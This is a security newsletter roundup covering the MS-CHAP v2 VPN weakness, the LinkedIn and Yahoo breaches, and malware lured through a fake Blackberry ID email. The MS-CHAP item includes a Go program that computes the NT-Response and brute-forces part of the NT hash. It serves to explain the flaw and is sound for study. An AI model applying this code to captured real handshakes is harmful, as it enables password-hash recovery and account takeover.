
What’s HOT in Application Security Vol#26

Microsoft vulnerable to VPN attack

Microsoft’s MS-CHAP v2 (Microsoft Challenge Handshake Authentication Protocol version 2), which is used to authenticate users of PPTP-based (Point-to-Point Tunneling Protocol) VPNs, has been shown to be breakable in practice, according to reports from the recent Defcon conference. The protocol’s weaknesses have been known since the 1999 cryptanalysis by Schneier, Mudge and Wagner; what the Defcon presentation added was a demonstration that recovering a user’s NT password hash from a single captured handshake reduces to brute-forcing one 56-bit DES key, a search that is feasible with dedicated hardware.

The Defcon conference is a venue for hackers and vendors alike. Defcon and similar venues give researchers a stage to present their latest techniques for exploiting software vulnerabilities, and vendors benefit by learning where and how their software is being broken.

Researchers at the conference demonstrated attacks that would let an eavesdropper recover the passwords used on some wireless networks and virtual private networks. The problem for Microsoft is that the technique is now public knowledge for any would-be attacker.
The fear is that Windows users are exposed to ‘man-in-the-middle’ attacks in which an attacker who can capture the MS-CHAP v2 handshake, whether on a wireless network or a VPN, recovers the password and with it whatever the account protects, as a direct result of the conference disclosure.

Microsoft has acknowledged the problem and recommends that IT administrators protect MS-CHAP v2 by wrapping it in PEAP (Protected Extensible Authentication Protocol), which tunnels the handshake inside TLS so that it cannot be captured off the wire; as yet Microsoft has not released a security update. Note that PEAP only helps if clients are configured to validate the server certificate: a client that accepts any certificate will happily complete the handshake with a rogue access point or VPN server that terminates the TLS tunnel itself.
For more information please go to:
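To make the weakness concrete, here is an added example (not code from the original page, nor from Microsoft) that implements the MS-CHAP v2 NT-Response computation from RFC 2759 and the cheap first step of the attack described above. The 16-byte NT hash is zero-padded to 21 bytes and split into three 7-byte DES keys that all encrypt the same 8-byte challenge hash; the third key contains only two unknown bytes, so it falls to a 65,536-trial search, and the remaining two keys share one plaintext, which is why the whole handshake collapses to a single 2^56 DES search. The NT hash, challenges and user name below are constructed sample values, not a captured handshake or official test vectors.

```go
package main

import (
	"bytes"
	"crypto/des"
	"crypto/sha1"
	"encoding/binary"
	"encoding/hex"
	"fmt"
)

// expandDESKey turns a 7-byte MS-CHAP v2 key fragment into the 8-byte form
// crypto/des expects: each output byte carries 7 key bits, and the low bit is
// the DES parity bit, which Go's implementation ignores.
func expandDESKey(k7 []byte) []byte {
	key := make([]byte, 8)
	key[0] = k7[0] & 0xFE
	key[1] = (k7[0] << 7) | (k7[1] >> 1)
	key[2] = (k7[1] << 6) | (k7[2] >> 2)
	key[3] = (k7[2] << 5) | (k7[3] >> 3)
	key[4] = (k7[3] << 4) | (k7[4] >> 4)
	key[5] = (k7[4] << 3) | (k7[5] >> 5)
	key[6] = (k7[5] << 2) | (k7[6] >> 6)
	key[7] = k7[6] << 1
	return key
}

// desEncryptBlock encrypts one 8-byte block under a 7-byte key fragment.
func desEncryptBlock(k7, block []byte) []byte {
	c, err := des.NewCipher(expandDESKey(k7))
	if err != nil {
		panic(err) // only possible with a wrong key length
	}
	out := make([]byte, 8)
	c.Encrypt(out, block)
	return out
}

// ChallengeHash follows RFC 2759 section 8.2:
// SHA1(PeerChallenge || AuthenticatorChallenge || UserName), truncated to 8 bytes.
func ChallengeHash(peerChallenge, authChallenge []byte, username string) []byte {
	h := sha1.New()
	h.Write(peerChallenge)
	h.Write(authChallenge)
	h.Write([]byte(username))
	return h.Sum(nil)[:8]
}

// NTResponse follows RFC 2759 section 8.5: the 16-byte NT hash is zero-padded
// to 21 bytes and split into three 7-byte DES keys, each of which encrypts the
// same challenge hash. The concatenated ciphertexts are the 24-byte response.
func NTResponse(challengeHash, ntHash []byte) []byte {
	padded := make([]byte, 21)
	copy(padded, ntHash) // bytes 16..20 remain zero
	resp := make([]byte, 0, 24)
	resp = append(resp, desEncryptBlock(padded[0:7], challengeHash)...)
	resp = append(resp, desEncryptBlock(padded[7:14], challengeHash)...)
	resp = append(resp, desEncryptBlock(padded[14:21], challengeHash)...)
	return resp
}

// RecoverLastTwoHashBytes is the cheap part of the attack: the third DES key is
// ntHash[14:16] followed by five zero bytes, so only 2^16 keys are possible and
// the last two bytes of the NT hash are found by exhaustive search.
func RecoverLastTwoHashBytes(challengeHash, ntResponse []byte) ([]byte, bool) {
	key := make([]byte, 7) // bytes 2..6 stay zero, exactly as in the protocol
	for cand := 0; cand < 1<<16; cand++ {
		binary.BigEndian.PutUint16(key[0:2], uint16(cand))
		if bytes.Equal(desEncryptBlock(key, challengeHash), ntResponse[16:24]) {
			return append([]byte(nil), key[0:2]...), true
		}
	}
	return nil, false
}

func main() {
	// Constructed sample values for this example, not a real handshake.
	ntHash, _ := hex.DecodeString("0123456789abcdef0123456789abcdef")
	peer := bytes.Repeat([]byte{0x11}, 16)
	auth := bytes.Repeat([]byte{0x22}, 16)
	ch := ChallengeHash(peer, auth, "alice")
	resp := NTResponse(ch, ntHash)
	fmt.Printf("challenge hash: %x\nNT-Response:    %x\n", ch, resp)
	if tail, ok := RecoverLastTwoHashBytes(ch, resp); ok {
		fmt.Printf("NT hash bytes 14..15 recovered after at most 65536 DES trials: %x\n", tail)
	}
	// The other 14 hash bytes sit in two independent 7-byte DES keys. Both
	// encrypt the same challenge hash, so one pass over the 2^56 DES key space,
	// checking each candidate against resp[0:8] and resp[8:16], recovers both.
	// The handshake never needs the password itself, only its NT hash, so the
	// recovered hash is enough to authenticate as the user.
}
```

The point to take from the code is structural: no amount of password length helps, because the response leaks the NT hash through three fixed-size DES operations, and the NT hash is all the protocol ever checks.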

Eliminating application level breaches

The recent attacks on two company giants, LinkedIn and Yahoo, and the subsequent theft of their password lists have only emphasised the obvious lapses in application security. LinkedIn also had a separate problem: an opt-in calendar feature in its Android and iOS mobile apps was sending user data back to LinkedIn servers as plain text. The application transmitted unencrypted calendar entries, including phone numbers and whatever passwords users had noted in them, to LinkedIn servers without the user’s knowledge. In the breach itself, the hashes of some 6.5 million passwords were stolen from the world’s leading professional social networking site; they had been stored as unsalted SHA-1, which can be cracked in bulk with precomputed tables or GPU brute force. Google, the US government and even NASA have also reportedly been recent hacking victims.

However, while most large companies focus their security efforts on network security, application security seems to be taking a back seat despite the huge number of applications now in use. The LinkedIn breach, like other recent high-profile attacks, was executed at the application level. Today multiple applications each have their own security standards and languages. According to VG Sundar, VP, Oracle India, ‘Organizations must secure the network at the application, endpoint, database and device levels’. Another benefit of looking at the application security level is that defining certain universal protocols and security standards may bring a certain ‘rigidity into the process of delivering IT’, says Kartik Shahani, Country Manager, India & SAARC, RSA.

Blackberry smartphones become victim of another malware attack

For the second time this month, Blackberry smartphones, which are generally not a target for hackers, have fallen victim to a new piece of malware. Users receive an email with the subject line ‘Your Blackberry ID has been created’. The email prompts users to follow the instructions in an attached file on how to take full advantage of their new Blackberry ID.
The email’s text and links are genuine, copied from a legitimate email from RIM, the maker of the Blackberry mobile device. The problem lies with the attachment. The attached .zip file drops executable files that modify the system registry so that the malware runs on the system’s next start-up. Since the dropper edits the system registry, the machine being infected is the Windows PC on which the user opens the attachment rather than the handset itself; the Blackberry branding is simply the lure.
